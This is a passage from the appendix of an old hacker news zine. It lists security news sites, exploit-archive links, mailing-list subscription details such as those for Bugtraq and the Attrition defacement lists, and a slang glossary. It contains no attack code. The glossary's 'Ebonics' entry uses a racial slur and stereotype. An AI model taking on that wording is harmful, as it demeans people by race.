      4 - Hackers should be judged by their hacking not bogus criteria such as
          degrees, age, race, or position. 
      5 - You create art and beauty on a computer. 
      6 - Computers can change your life for the better. 

     The Internet as a whole reflects this ethic.
     
     @HWA
     
A.5  Sources *** (VERY incomplete)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                      ____
                     / ___|  ___  _   _ _ __ ___ ___ ___
                     \___ \ / _ \| | | | '__/ __/ _ Y __|
                      ___) | (_) | |_| | | | (_|  __|__ \
                     |____/ \___/ \__,_|_|  \___\___|___/


     Sources can be some, all, or none of the following (by no means complete
    nor listed in any degree of importance) Unless otherwise noted, like msgs
    from lists or news from other sites, articles and information is compiled
    and or sourced by Cruciphux no copyright claimed.


    News site.........................http://www.ukhackers.com/  *NEW*
    News site.........................http://www.hackernews.com.br/ *NEW* 
    News & I/O zine ................. http://www.antionline.com/
    Back Orifice/cDc..................http://www.cultdeadcow.com/
   *News site (HNN) ..................http://www.hackernews.com/
    Help Net Security.................http://net-security.org/
    News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
    NewsTrolls .(daily news ).........http://www.newstrolls.com/
    General Security/Exploits.........http://packetstorm.securify.com/
    News + Exploit archive ...........http://www.rootshell.com/beta/news.html
    CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
    News site+........................http://www.zdnet.com/
    News site+Security................http://www.gammaforce.org/
    News site+Security................http://www.projectgamma.com/
    News site+Security................http://securityhole.8m.com/
    News site+Security related site...http://www.403-security.org/ 
    News/Humour site+ ................http://www.innerpulse.com
    News/Techie news site.............http://www.slashdot.org
    
    * HNN Also archives back issues of their news, use the following url format
    
      http://www.hackernews.com/arch.html?012700
    
      where 01=Jan 27=Date 00=Year. They are archived here also as part of the
      compilation and broad archival concept we are trying to maintain with this
      publication. - Ed
    
    

    +Various mailing lists and some newsgroups, such as ...
    +other sites available on the HNN affiliates page, please see
     http://www.hackernews.com/affiliates.html as they seem to be popping up
     rather frequently ...

    
    http://www.the-project.org/ .. IRC list/admin archives
    http://www.anchordesk.com/  .. Jesse Berst's AnchorDesk

    alt.hackers.malicious
    alt.hackers
    alt.2600
    BUGTRAQ
    ISN security mailing list
    ntbugtraq
    win2kbugtraq
    <+others>
    
    @HWA
    
    
    
A.6 Resources
    ~~~~~~~~~     
                       ___
                      | _ \___ ______ _  _ _ _ __ ___ ___
                      |   / -_|_-< _ \ || | '_/ _/ -_|_-<
                      |_|_\___/__|___/\_,_|_| \__\___/__/


    NEWS Agencies, News search engines etc:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    PLEASE if you have any changes or additions for this section please
    mail them to cruciphux@dok.org. Thank you.
    
    
    http://www.newsnow.co.uk/-NewsFeed.Tech.htm  *NEW* from Tep
    
    http://www.cnn.com/SEARCH/
       
    http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
        
    http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
        
    http://www.ottawacitizen.com/business/
        
    http://search.yahoo.com.sg/search/news_sg?p=hack
        
    http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
        
    http://www.zdnet.com/zdtv/cybercrime/
        
    http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
        
    NOTE: See appendices for details on other links.
    


    http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
        
    http://freespeech.org/eua/ Electronic Underground Affiliation
        
    http://ech0.cjb.net ech0 Security
    
    http://axon.jccc.net/hir/ Hackers Information Report
        
    http://net-security.org Net Security
        
    http://www.403-security.org Daily news and security related site
    
    http://www.hack.co.za/ Current exploits archive  ** BACK ONLINE AS OF FEB 22ND **
    
    ** Due to excessive network attacks this site was being mirrored 
       at http://www.siliconinc.net/hack/ if the above link is down again try here.
       
    Please send in links that you think should belong here to keep this section
    up to date, it is overdue for updating!
    
        

A.7  Submissions/Hints/Tips/Etc
     ~~~~~~~~~~~~~~~~~~~~~~~~~~
    
            ____        _               _         _
           / ___| _   _| |__  _ __ ___ (_)___ ___(_) ___  _ __  ___
           \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
            ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
           |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/


    All submissions that are `published' are printed with the credits
    you provide, if no response is received by a week or two it is assumed
    that you don't care whether the article/email is to be used in an issue
    or not and may be used at my discretion.

    Looking for:

    Good news sites that are not already listed here OR on the HNN affiliates
    page at http://www.hackernews.com/affiliates.html

    Magazines (complete or just the articles) of breaking sekurity or hacker
    activity in your region, this includes telephone phraud and any other
    technological use, abuse hole or cool thingy. ;-) cut em out and send it
    to the drop box.


    - Ed
    
    
    

A.8 Mailing list Info
    ~~~~~~~~~~~~~~~~~



    Mailing List Subscription Info   (Far from complete)         Feb 1999
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   ~~~~~~~~~~~~~~~~~~~         ~~~~~~~~

    ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
    
    
    ATTRITION.ORG's Website defacement mirror and announcement lists
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    http://www.attrition.org/mirror/attrition/    
    http://www.attrition.org/security/lists.html
    
    --
      
      defaced [web page defacement announce list]
      
      This is a public LOW VOLUME (1) mail list to circulate news/info on 
      defaced web sites. To subscribe to Defaced, send mail to 
      majordomo@attrition.org with "subscribe defaced" in the BODY of 
      the mail.
      
      There will be two types of posts to this list:
      
              1. brief announcements as we learn of a web defacement.
                 this will include the site, date, and who signed the 
                 hack. we will also include a URL of a mirror of the hack.
      
              2. at the end of the day, a summary will be posted
                 of all the hacks of the day. these can be found
                 on the mirror site listed under 'relevant links'
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: mcintyre@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
      (1) It is low volume on a normal day. On days of many defacements,
          traffic may be increased. On a few days, it is a virtual mail
          flood. You have been warned. ;)
      
    -=-
    
    --
      
      defaced summary [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced domains on a given day. To subscribe to Defaced-Summary, send mail to 
      majordomo@attrition.org with "subscribe defaced-summary" in the BODY of 
      the mail.
      
      There will be ONE type of post to this list:
      
              1. a single nightly piece of mail listing all reported
                 domains. the same information can be found on
                 http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
              
     -=-
     
      defaced GM [web page defacement announce list]
      
      This is a low traffic mail list to announce all publicly
      defaced government and military domains on a given day. To subscribe to 
      Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" 
      in the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personnel charged with tracking security incidents on
      government run networks.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
              
     
      --
      
      defaced alpha [web page defacement announce list]
      
      This is a low traffic mail list to announce via alpha-numeric
      pagers, all publicly defaced government and military domains 
      on a given day. To subscribe to Defaced-Alpha, send mail to 
      majordomo@attrition.org with "subscribe defaced-alpha" in 
      the BODY of the mail.
      
      There will be ONE type of post to this list:
      
              1. sporadic pieces of mail for each government (.gov)
                 or military (.mil) system defaced. the information
                 will only include domain names. the same information 
                 can be found on http://www.attrition.org/mirror/attrition/
                 via sporadic updates.
      
      This list is designed primarily for government and military
      personnel charged with tracking security incidents on
      government run networks. Further, it is designed for 
      quick response and aimed at law enforcement agencies like
      DCIS and the FBI.
      
      To subscribe to this list, a special mail will be sent to YOUR
      alpha-numeric pager. A specific response must be made within
      12 hours of receiving the mail to be subscribed. If the response
      is not received, it is assumed the mail was not sent to your 
      pager.
      
      This list is for informational purposes only. Subscribing
      denotes your acceptance of the following:
      
              1. we have nothing to do with the hacks. at all.
      
              2. we are only mirroring the work of OTHER people.
      
              3. we can not be held liable for anything related to these
                 hacks.
      
              4. all of the points on the disclaimer listed below.
      
      Under no circumstances may the information on this list be used
      to solicit security business. You do not have permission to forward
      this mail to anyone related to the domain that was defaced.
      
      enjoy.
      
      List maintainer: jericho@attrition.org
      Hosted by: majordomo@attrition.org
      
      Relevant Links: 
              Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
              ATTRITION Mirror: http://www.attrition.org/mirror/
      
         
      
    -=-     
      

    


    THE MOST READ:

    BUGTRAQ - Subscription info
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~

    What is Bugtraq?

    Bugtraq is a full-disclosure UNIX security mailing list, (see the info
    file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
    bugtraq, send mail to listserv@netspace.org containing the message body
    subscribe bugtraq. I've been archiving this list on the web since late
    1993. It is searchable with glimpse and archived on-the-fly with hypermail.

    Searchable Hypermail Index;

          http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

          

    About the Bugtraq mailing list
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    The following comes from Bugtraq's info file:

    This list is for *detailed* discussion of UNIX security holes: what they are,
    how to exploit, and what to do to fix them.

    This list is not intended to be about cracking systems or exploiting their
    vulnerabilities. It is about defining, recognizing, and preventing use of
    security holes and risks.

    Please refrain from posting one-line messages or messages that do not contain
    any substance that can relate to this list's charter.

    I will allow certain informational posts regarding updates to security tools,
    documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
    on this list.

    Please follow the below guidelines on what kind of information should be posted
    to the Bugtraq list:

    + Information on Unix related security holes/backdoors (past and present)
    + Exploit programs, scripts or detailed processes about the above
    + Patches, workarounds, fixes
    + Announcements, advisories or warnings
    + Ideas, future plans or current works dealing with Unix security
    + Information material regarding vendor contacts and procedures
    + Individual experiences in dealing with above vendors or security 
      organizations
    + Incident advisories or informational reporting

    Any non-essential replies should not be directed to the list but to the
    originator of the message. Please do not "CC" the bugtraq reflector 
    address if the response does not meet the above criteria.

    Remember: YOYOW.

    You own your own words. This means that you are responsible for the words
    that you post on this list and that reproduction of those words without 
    your permission in any medium outside the distribution of this list may be
    challenged by you, the author.

    For questions or comments, please mail me:
    chasin@crimelab.com (Scott Chasin)
    
    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

      I am pleased to inform you of several changes that will be occurring
      on June 5th. I hope you find them as exciting as I do.
      
      
      BUGTRAQ moves to a new home
      ---------------------------
      
      
      First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
      to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
      below. Other than the change of domains nothing of how the list
      is run changes. I am still the moderator. We play by the same rules.
      
      
      Security Focus will be providing mail archives for BUGTRAQ. The
      archives go back longer than Netspace's and are more complete than
      Geek-Girl's.
      
      
      The move will occur one week from today. You will not need to
      resubscribe. All your information, including subscription options
      will be moved transparently.
      
      
      Any of you using mail filters (e.g. procmail) to sort incoming
      mail into mail folders by examining the From address will have to
      update them to include the new address. The new address will be:
      
      
                            BUGTRAQ@SECURITYFOCUS.COM
      
      
      Security Focus will also be providing a free searchable vulnerability
      database.
      
      
      BUGTRAQ es muy bueno
      --------------------
      
      
      It has also become apparent that there is a need for forums
      in the spirit of BUGTRAQ where non-English speaking people
      or people that don't feel comfortable speaking English can
      exchange information.
      
      
      As such I've decided to give BUGTRAQ in other languages a try.
      BUGTRAQ will continue to be the place to submit vulnerability
      information, but if you feel more comfortable using some other
      language you can give the other lists a try. All relevant information
      from the other lists which have not already been covered here
      will be translated and forwarded on by the list moderator.
      
      
      In the next couple of weeks we will be introducing BUGTRAQ-JP
      (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
      and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
      from Argentina <http://www.core-sdi.com/> (the folks that brought you
      Secure Syslog and the SSH insertion attack).
      
      
      What is Security Focus?
      -----------------------
      
      
      Security Focus is an exercise in creating a community and a security
      resource. We hope to be able to provide a medium where useful and
      successful resources such as BUGTRAQ can occur, while at the same
      time providing a comprehensive source of security information. Aside
      from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
      herself!) have moved over to Security Focus to help us with building
      this new community. The other staff at Security Focus are largely derived
      from long time supporters of Bugtraq and the community in general. If
      you are interested in viewing the staff pages, please see the 'About'
      section on www.securityfocus.com.
      
      
      On the community creating front you will find a set of forums
      and mailing lists we hope you will find useful. A number of them
      are not scheduled to start for several weeks but starting today
      the following list is available:
      
      
      * Incidents' Mailing List. BUGTRAQ has always been about the
         discussion of new vulnerabilities. As such I normally don't approve
         messages about break-ins, trojans, viruses, etc with the exception
         of wide spread cases (Melissa, ADM worm, etc). The other choice
         people are usually left with is email CERT but this fails to
         communicate this important information to others that may be
         potentially affected.
      
      
         The Incidents mailing list is a lightly moderated mailing list to
         facilitate the quick exchange of security incident information.
         Topical items include such things as information about rootkits,
         new trojan horses and viruses, source of attacks and tell-tale
         signs of intrusions.
      
      
         To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
         of:
      
      
                   SUBS INCIDENTS FirstName, LastName
      
      
      Shortly we'll also be introducing an Information Warfare forum along
      with ten other forums over the next two months. These forums will be
      built and moderated by people in the community as well as vendors who
      are willing to take part in the community building process.
      *Note to the vendors here* We have several security vendors who have
      agreed to run forums where they can participate in the online communities.
      If you would like to take part as well, mail Alfred Huger,
      ahuger@securityfocus.com.
      
      
      On the information resource front you find a large database of
      the following:
      
      
      * Vulnerabilities. We are making accessible a free vulnerability
         database. You can search it by vendor, product and keyword. You
         will find detailed information on the vulnerability and how to fix it,
         as well as links to reference information such as email messages,
         advisories and web pages. You can search by vendor, product and
         keywords. The database itself is the result of culling through 5
         years of BUGTRAQ plus countless other lists and news groups. It's
         a shining example of how thorough full disclosure has made a significant
         impact on the industry over the last half decade.
      
      
      * Products. An incredible number of categorized security products
         from over two hundred different vendors.
      
      
      * Services. A large and focused directory of security services offered by
         vendors.
      
      
      * Books, Papers and Articles. A vast number of categorized security
         related books, papers and articles. Available to download directly
         from our servers when possible.
      
      
      * Tools. A large array of free security tools. Categorized and
         available for download.
      
      
      * News: A vast number of security news articles going all the way
         back to 1995.
      
      
      * Security Resources: A directory to other security resources on
         the net.
      
      
      As well as many other things such as an event calendar.
      
      
      For your convenience the home-page can be personalized to display
      only information you may be interested in. You can filter by
      categories, keywords and operating systems, as well as configure
      how much data to display.
      
      
      I'd like to thank the fine folks at NETSPACE for hosting the
      site for as long as they have. Their services have been invaluable.
      
      
      I hope you find these changes for the best and the new services
      useful. I invite you to visit http://www.securityfocus.com/ and
      check it out for yourself. If you have any comments or suggestions
      please feel free to contact me at this address or at
      aleph1@securityfocus.com.
      
      
      Cheers.
      
      
      --
      Aleph One / aleph1@underground.org
      http://underground.org/
      KeyID 1024/948FD6B5
      Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
      



    
    Crypto-Gram
    ~~~~~~~~~~~

       CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
      insights, and commentaries on cryptography and computer security.

      To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
      blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
      visit http://www.counterpane.com/unsubform.html. Back issues are available
      on http://www.counterpane.com.

       CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
      Counterpane Systems, the author of "Applied Cryptography," and an inventor
      of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
      the International Association for Cryptologic Research, EPIC, and VTW. He
      is a frequent writer and lecturer on cryptography.


    CUD Computer Underground Digest
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    This info directly from their latest ish:

    Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09

 ISSN 1004-042X

 Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
 News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
 Archivist: Brendan Kehoe
 Poof Reader: Etaion Shrdlu, Jr.
 Shadow-Archivists: Dan Carosone / Paul Southworth
 Ralph Sims / Jyrki Kuoppala
 Ian Dickinson
 Cu Digest Homepage: http://www.soci.niu.edu/~cudigest



    [ISN] Security list
    ~~~~~~~~~~~~~~~~~~~
    This is a low volume list with lots of informative articles, if I had my
    way i'd reproduce them ALL here, well almost all .... ;-) - Ed

    
    UPDATED Sept/99 - Sent in by Androthi, tnx for the update
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
      
      --[ New ISN announcement (New!!)
      
      
      Sender:       ISN Mailing List <ISN@SECURITYFOCUS.COM>
      From:         mea culpa <jericho@DIMENSIONAL.COM>
      Subject:      Where has ISN been?
      Comments: To: InfoSec News <isn@securityfocus.com>
      To:           ISN@SECURITYFOCUS.COM
      
      
      It all starts long ago, on a network far away..
      
      
      Not really. Several months ago the system that hosted the ISN mail list
      was taken offline. Before that occurred, I was not able to retrieve the
      subscriber list. Because of that, the list has been down for a while. I
      opted to wait to get the list back rather than attempt to make everyone
      resubscribe.
      
      
      As you can see from the headers, ISN is now generously being hosted by
      Security Focus [www.securityfocus.com]. They are providing the bandwidth,
      machine, and listserv that runs the list now.
      
      
      Hopefully, this message will find all ISN subscribers, help us weed out
      dead addresses, and assure you the list is still here. If you have found
      the list to be valuable in the past, please tell friends and associates
      about the list. To subscribe, mail listserv@securityfocus.com with
      "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".
      
      
      As usual, comments and suggestions are welcome. I apologize for the down
      time of the list. Hopefully it won't happen again. ;)
      
      
      
      mea_culpa
      www.attrition.org
      
      
      
      --[ Old ISN welcome message
      
      
      [Last updated on: Mon Nov  04  0:11:23 1998]
      
      
      InfoSec News is a privately run, medium traffic list that caters 
      to distribution of information security news articles. These 
      articles will come from newspapers, magazines, online resources, 
      and more.
      
      
      The subject line will always contain the title of the article, so that
      you may quickly and efficiently filter past the articles of no interest.
      
      
      This list will contain:
      
      
      o       Articles catering to security, hacking, firewalls, new security
              encryption, products, public hacks, hoaxes, legislation affecting
              these topics and more.
      
      
      o       Information on where to obtain articles in current magazines.
      
      
      o       Security Book reviews and information.
      
      
      o       Security conference/seminar information.
      
      
      o       New security product information.
      
      
      o       And anything else that comes to mind..
      
      
      Feedback is encouraged. The list maintainers would like to hear what
      you think of the list, what could use improving, and which parts
      are "right on". Subscribers are also encouraged to submit articles
      or URLs. If you submit an article, please send either the URL or
      the article in ASCII text. Further, subscribers are encouraged to give
      feedback on articles or stories, which may be posted to the list.
      
      
      Please do NOT:
      
      
              * subscribe vanity mail forwards to this list
      
      
              * subscribe from 'free' mail addresses (ie: juno, hotmail)
      
      
              * enable vacation messages while subscribed to mail lists
      
      
              * subscribe from any account with a small quota
      
      
      All of these generate messages to the list owner and make tracking
      down dead accounts very difficult. I am currently receiving as many 
      as fifty returned mails a day. Any of the above are grounds for
      being unsubscribed. You are welcome to resubscribe when you address
      the issue(s).
      
      
      Special thanks to the following for continued contribution:
              William Knowles, Aleph One, Will Spencer, Jay Dyson,
              Nicholas Brawn, Felix von Leitner, Phreak Moi and 
              other contributors.
      
      
      ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
      ISN Archive: http://www.landfield.com/isn
      ISN Archive: http://www.jammed.com/Lists/ISN/
      
      
      ISN is Moderated by 'mea_culpa' <jericho@dimensional.com>. ISN is a
          private list. Moderation of topics, member subscription, and
          everything else about the list is solely at his discretion.
      
      
      The ISN membership list is NOT available for sale or disclosure.  
      
      
      ISN is a non-profit list. Sponsors are only donating to cover bandwidth 
          and server costs. 
          
          
     Win2k Security Advice Mailing List (new added Nov 30th)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
      To subscribe:
      
      
      send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the message body
      to  listserv@listserv.ntsecurity.net
      
     
      
      Welcome to Win2K Security Advice! Thank you for subscribing. If you have any
      questions or comments about the list please feel free to contact the list
      moderator, Steve Manzuik, at steve@win2ksecadvice.net.
      
      To see what you've missed recently on the list, or to research an item
      of interest, be sure to visit the Web-based archives located at:
      http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec
      
      ==============
      NTSecurity.net brings the security community a brand new (Oct 99) and
      much-requested Windows security mailing list. This new moderated mailing list,
      Win2KSecAdvice (formerly NTSecAdvice,) is geared towards promoting the open
      discussion of Windows-related security issues.
      
      With a firm and unwavering commitment towards timely full disclosure, this
      new resource promises to become a great forum for open discussion
      regarding security-related bugs, vulnerabilities, potential exploits, virus,
      worms, Trojans, and more. Win2KSecAdvice promotes a strong sense of community
      and we openly invite all security minded individuals, be they white hat,
      gray hat, or black hat, to join the new mailing list.
      
      While Win2KSecAdvice was named in the spirit of Microsoft's impending product
      line name change, and meant to reflect the list's security focus both now and
      in the long run, it is by no means limited to security topics centered around
      Windows 2000. Any security issues that pertain to Windows-based networking are
      relevant for discussion, including all Windows operating systems, MS Office,
      MS BackOffice, and all related third party applications and hardware.
      
      The scope of Win2KSecAdvice can be summarized very simply: if it's relevant to
      a security risk, it's relevant to the list.
      
      The list archives are available on the Web at http://www.ntsecurity.net,
      which include a List Charter and FAQ, as well as Web-based searchable list
      archives for your research endeavors.
      
      SAVE THIS INFO FOR YOUR REFERENCE:
      
      To post to the list simply send your email to
      win2ksecadvice@listserv.ntsecurity.net
      
      To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
      listserv@listserv.ntsecurity.net
      
      Regards,
      
      Steve Manzuik, List Moderator
      Win2K Security Advice
      steve@win2ksecadvice.net     

    @HWA
    

A.9  Whats in a name? why HWA.hax0r.news??
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                             
      
      Well what does HWA stand for? never mind if you ever find out I may
     have to get those hax0rs from 'Hackers' or the Pretorians after you.

     In case you couldn't figure it out hax0r is "new skewl" and although
     it is laughed at, shunned, or even pigeonholed with those 'dumb
     leet (l33t?) dewds' <see article in issue #4> this is the state
     of affairs. It ain't Steven Levy's HACKERS anymore. BTW to all you
     up and comers, I'd highly recommend you get that book. It's almost
     like buying a clue. Anyway..on with the show .. - Editorial staff


     @HWA

A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
                    _   ___        ___      _____ _    ___
                   | | | \ \      / / \    |  ___/ \  / _ \
                   | |_| |\ \ /\ / / _ \   | |_ / _ \| | | |
                   |  _  | \ V  V / ___ \ _|  _/ ___ \ |_| |
                   |_| |_|  \_/\_/_/   \_(_)_|/_/   \_\__\_\
                     

    Also released in issue #3. (revised) check that issue for the faq
    it won't be reprinted unless changed in a big way with the exception
    of the following excerpt from the FAQ, included to assist first time
    readers:

    Some of the stuff related to personal usage and use in this zine are
    listed below: Some are very useful, others attempt to deny any possible
    attempts at eschewing obfuscation by obscuring their actual definitions.

    @HWA   - see EoA  ;-)

    !=     - Mathematical notation "is not equal to" or "does not equal"
             ASC(247)  "wavey equals" sign means "almost equal" to. If written
             an =/= (equals sign with a slash thru it) also means !=, =< is Equal
             to or less than and =>  is equal to or greater than (etc, this aint
             fucking grade school, cripes, don't believe I just typed all that..)

    AAM    - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)

    AOL    - A great deal of people that got ripped off for net access by a huge
             clueless isp with sekurity that you can drive buses through, we're
             not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
             least they could try leasing one??

   *CC     - 1 - Credit Card (as in phraud)
             2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

    CCC    - Chaos Computer Club (Germany)

   *CON    - Conference, a place hackers crackers and hax0rs among others go to swap
             ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
             watch videos and seminars, get drunk, listen to speakers, and last but
             not least, get drunk.
   *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
                 speak he's the guy that breaks into systems and is often (but by no
                 means always) a "script kiddie" see pheer
              2 . An edible biscuit usually crappy tasting without a nice dip, I like
                  jalapeno pepper dip or chives sour cream and onion, yum - Ed

    Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
              Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
              ebonics, speaking in a dark tongue ... being ereet, see pheer

    EoC    - End of Commentary

    EoA    - End of Article or more commonly @HWA

    EoF    - End of file

    EoD    - End of diatribe (AOL'ers: look it up)

    FUD    - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
            usually in general media articles not high brow articles such as ours or other
            HNN affiliates ;)

    du0d   - a small furry animal that scurries over keyboards causing people to type
             weird crap on irc, hence when someone says something stupid or off topic
             'du0d wtf are you talkin about' may be used.

   *HACKER - Read Steven Levy's HACKERS for the true definition, then see HAX0R

   *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
            define, I think it is best defined as pop culture's view on The Hacker ala
            movies such as well erhm "Hackers" and The Net etc... usually used by "real"
            hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
            some coffee?' or can you hax0r some bread on the way to the table please?'

            2 - A tool for cutting sheet metal.

    HHN    - Maybe a bit confusing with HNN but we did spring to life around the same
             time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
             noun means the hackernews site proper. k? k. ;&

    HNN    - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

    J00    - "you"(as in j00 are OWN3D du0d) - see 0wn3d

    MFI/MOI- Missing on/from IRC

    NFC   - Depends on context: No Further Comment or No Fucking Comment

    NFR   - Network Flight Recorder (Do a websearch) see 0wn3d

    NFW   - No fuckin'way

   *0WN3D - You are cracked and owned by an elite entity see pheer
   *OFCS  - Oh for christ's sakes

    PHACV - And variations of same <coff>
            Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, 
            Warfare

          Alternates: H - hacking, hacktivist
                      C - Cracking <software>
                      C - Cracking <systems hacking>
                      V - Virus
                      W - Warfare <cyberwarfare usually as in Jihad>
                      A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
                      P - Phreaking, "telephone hacking" PHone fREAKs ...
                     CT - Cyber Terrorism

   *PHEER -  This is what you do when an ereet or elite person is in your presence
            see 0wn3d

   *RTFM  - Read the fucking manual - not always applicable since some manuals are
            pure shit but if the answer you seek is indeed in the manual then you
            should have RTFM you dumb ass.

    TBC   - To Be Continued also 2bc (usually followed by ellipses...) :^0

    TBA   - To Be Arranged/To Be Announced also 2ba

    TFS   - Tough fucking shit.

   *w00t  - 1 - Reserved for the uber ereet, no one can say this without severe repercussions
            from the underground masses. also "w00ten" <sic>

            2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

    *wtf  - what the fuck, where the fuck, when the fuck etc ..

    *ZEN  - The state you reach when you *think* you know everything (but really don't)
            usually shortly after reaching the ZEN like state something will break that
            you just 'fixed' or tweaked.
            
            
A.11  NEW Underground E-Zines
      ~~~~~~~~~~~~~~~~~~~~~~~
      
      New releases:
      
      SET Saqueadores Edición Técnica: http://www.set-ezine.org
      f41th magazine issue 12 is out.: http://f41th.com/index2.html
      Digital Defiance 5 (!) is out..: http://www.hackers.cx
      
      
      New zines on the scene:       

      InET.......................... http://www.warpedreality.com/inet
      Hack In the Box............... http://www.thelimit.net/hitb      
      Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt      
      DataZine...................... http://www.tdcore.com
      Napalm........................ http://napalm.firest0rm.org/
      Digital Defiance.............. http://www.hackers.cx  
      
      
            
   @HWA            
   
   

  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
